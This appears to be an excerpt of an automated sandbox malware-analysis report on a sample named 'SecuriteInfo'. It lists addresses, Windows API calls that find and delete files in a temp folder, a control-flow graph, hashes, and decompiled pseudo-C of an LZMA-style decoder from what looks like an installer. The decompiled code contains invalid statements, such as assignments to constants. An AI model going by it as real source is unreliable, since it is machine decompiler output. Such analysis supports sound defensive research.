                                                                                              0x00405db6
                                                                                              0x00405db6
                                                                                              0x00405dba
                                                                                              0x00405dcd
                                                                                              0x00405dd4
                                                                                              0x00405dd9
                                                                                              0x00405ddd
                                                                                              0x00405ded
                                                                                              0x00405ddf
                                                                                              0x00405de5
                                                                                              0x00405de5
                                                                                              0x00405df2
                                                                                              0x00405df6
                                                                                              0x00405e02
                                                                                              0x00405e08
                                                                                              0x00405e0d
                                                                                              0x00405e13
                                                                                              0x00405e1e
                                                                                              0x00405e24
                                                                                              0x00405e26
                                                                                              0x00405e29
                                                                                              0x00405ed3
                                                                                              0x00405ed3
                                                                                              0x00405ed7
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00405ed9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e2f
                                                                                              0x00405e2f
                                                                                              0x00405e2f
                                                                                              0x00405e37
                                                                                              0x00405e57
                                                                                              0x00405e5f
                                                                                              0x00405e64
                                                                                              0x00405e6b
                                                                                              0x00405e86
                                                                                              0x00405e8b
                                                                                              0x00405e8d
                                                                                              0x00405eb1
                                                                                              0x00405e8f
                                                                                              0x00405e8f
                                                                                              0x00405e92
                                                                                              0x00405ea6
                                                                                              0x00405e94
                                                                                              0x00405e97
                                                                                              0x00405e9f
                                                                                              0x00405e9f
                                                                                              0x00405e92
                                                                                              0x00405e6d
                                                                                              0x00405e73
                                                                                              0x00405e75
                                                                                              0x00405e7b
                                                                                              0x00405e7b
                                                                                              0x00405e75
                                                                                              0x00000000
                                                                                              0x00405e6b
                                                                                              0x00405e39
                                                                                              0x00405e41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e43
                                                                                              0x00405e4b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405e4d
                                                                                              0x00405e55
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405eb6
                                                                                              0x00405ebe
                                                                                              0x00405ec4
                                                                                              0x00405ec4
                                                                                              0x00405ecd
                                                                                              0x00000000
                                                                                              0x00405ecd
                                                                                              0x00405df8
                                                                                              0x00405e00
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405dbc
                                                                                              0x00405dbc
                                                                                              0x00405dbe
                                                                                              0x00405ede
                                                                                              0x00405ee0
                                                                                              0x00405ee3
                                                                                              0x00405f34
                                                                                              0x00405f34
                                                                                              0x00405f34
                                                                                              0x00405ee5
                                                                                              0x00405ee8
                                                                                              0x00405ef3
                                                                                              0x00405ef8
                                                                                              0x00405efa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405efd
                                                                                              0x00405f09
                                                                                              0x00405f0e
                                                                                              0x00405f10
                                                                                              0x00000000
                                                                                              0x00405f2b
                                                                                              0x00405f12
                                                                                              0x00405f15
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f1a
                                                                                              0x00000000
                                                                                              0x00405f21
                                                                                              0x00405eea
                                                                                              0x00405eea
                                                                                              0x00000000
                                                                                              0x00405eea
                                                                                              0x00405dc4
                                                                                              0x00405dc7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405dc7

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,7476FAA0,7476F560,00000000), ref: 00405D9D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\*.*,\*.*), ref: 00405DE5
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E0E
                                                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E1E
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                              • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\*.*$\*.*
                                                                                              • API String ID: 2035342205-1589727259
                                                                                              • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                              • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                              • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                              • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 631->635 632->619 634->578 635->602
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
